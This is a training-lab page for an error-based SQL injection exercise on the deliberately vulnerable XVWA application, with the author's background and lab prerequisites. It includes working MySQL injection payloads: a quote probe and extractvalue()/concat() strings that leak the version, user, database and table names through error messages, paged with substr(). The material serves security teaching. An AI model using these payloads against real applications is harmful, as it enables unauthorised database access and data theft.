
XVWA-SQLi (Error)

XVWA - SQL Injection

This lab shows step-by-step how to exploit an Error-Based SQL Injection on the Xtreme Vulnerable Web Application (XVWA) to retrieve information from the back-end database.

XVWA is a deliberately badly coded web application written in PHP/MySQL that helps security enthusiasts learn application security. The idea is to evangelize web application security to the community in the easiest and most fundamental way possible. Learn and acquire these skills for good purposes.

Why are SQL Injections important?

SQL Injection vulnerabilities are among the most severe weaknesses found in the wild. SQL Injection attacks are unfortunately very common, for two reasons:

  • the significant prevalence of SQL Injection vulnerabilities, and
  • the attractiveness of the target: the database typically holds all of the interesting and critical data of the application.

What will you learn?

  • What is SQL Injection.
  • How to identify an Error-Based SQL Injection.
  • How to exploit an Error-Based SQL Injection to retrieve information from the back-end database.
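What identifying and exploiting an error-based injection looks like against a MySQL back end, as an added example that is not part of the scenario or of XVWA's own code: the `items` table, the `itemid` parameter and the sample rows are constructed here for illustration, and the only assumption is a MySQL server whose query errors the application echoes into the HTTP response, which is the condition an error-based technique relies on.

```sql
-- Constructed sample schema, not XVWA's own: one table the vulnerable page reads from.
-- itemid=1 exists on purpose, so the WHERE clause reaches the injected AND condition.
CREATE TABLE items (itemid INT, name VARCHAR(64));
INSERT INTO items VALUES (1, 'espresso'), (2, 'latte');

-- 1. Intended query. The application pastes the itemid parameter straight into the
--    SQL string, so with itemid=1 it executes exactly this:
SELECT name FROM items WHERE itemid = '1';

-- 2. Identification probe: itemid=1' (an unbalanced single quote).
--    The statement is now syntactically invalid. If the page prints the driver error,
--    the response contains "You have an error in your SQL syntax", which proves the
--    parameter reaches the SQL parser unescaped and that errors are visible to us.
SELECT name FROM items WHERE itemid = '1'';

-- 3. Error-based extraction: itemid=1' AND extractvalue(1, concat(0x7e, (SELECT version()))) -- -
--    extractvalue() evaluates its second argument as an XPath expression. A string that
--    starts with '~' (0x7e) is not valid XPath, so MySQL raises "XPATH syntax error" and
--    echoes the offending string, i.e. the subquery result, inside the error message.
--    "-- -" comments out the application's trailing quote.
SELECT name FROM items WHERE itemid = '1' AND extractvalue(1, concat(0x7e, (SELECT version()))) -- -';

-- 4. The same trick for any subquery that returns a single value.
SELECT name FROM items WHERE itemid = '1' AND extractvalue(1, concat(0x7e, (SELECT user()))) -- -';
SELECT name FROM items WHERE itemid = '1' AND extractvalue(1, concat(0x7e, (SELECT database()))) -- -';

-- 5. Multi-row results must be read one row at a time with LIMIT, because the
--    subquery inside concat() may only return a single row.
SELECT name FROM items WHERE itemid = '1' AND extractvalue(1, concat(0x7e,
  (SELECT table_name FROM information_schema.tables WHERE table_schema = database() LIMIT 0,1))) -- -';

-- 6. Caveat: the XPATH error shows at most 32 characters of the string (31 after the '~'),
--    so longer values are paged through in 31-character windows with substr().
SELECT name FROM items WHERE itemid = '1' AND extractvalue(1, concat(0x7e,
  substr((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = database()), 1, 31))) -- -';
```

Steps 2 to 6 are meant to fail: each failure is the channel, and the interesting part is the text of the MySQL error that the application renders. Step 2 produces the generic syntax error that tells you the injection exists; steps 3 to 6 produce "ERROR 1105 (HY000): XPATH syntax error:" followed by the '~' and the extracted value. If the application suppresses database errors, these payloads still run on the server but leak nothing, and you would fall back to a blind technique instead.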

Technical Details

  • This scenario contains one virtual machine.
  • VPN Connection Required: Optional
  • This lab can be completed by either connecting to the CR VPN or by simply utilizing the Web Proxy feature.
  • The examples demonstrated throughout this scenario are based on Linux.

Scenario Pre-requisites

In order to benefit from this scenario it is recommended that you have competence in the following areas:

  • what Structured Query Language (SQL) is
  • how web applications work behind the scenes
  • how to use an HTTP intercepting proxy

About the Author

Marios holds a BSc Computer Science degree from Northumbria University and an MSc degree in Cyber Security from the University of York. He is one of the OWASP Cyprus Chapter Leaders and he is passionate about web application security. He likes to spend his free time mastering his backgammon skills.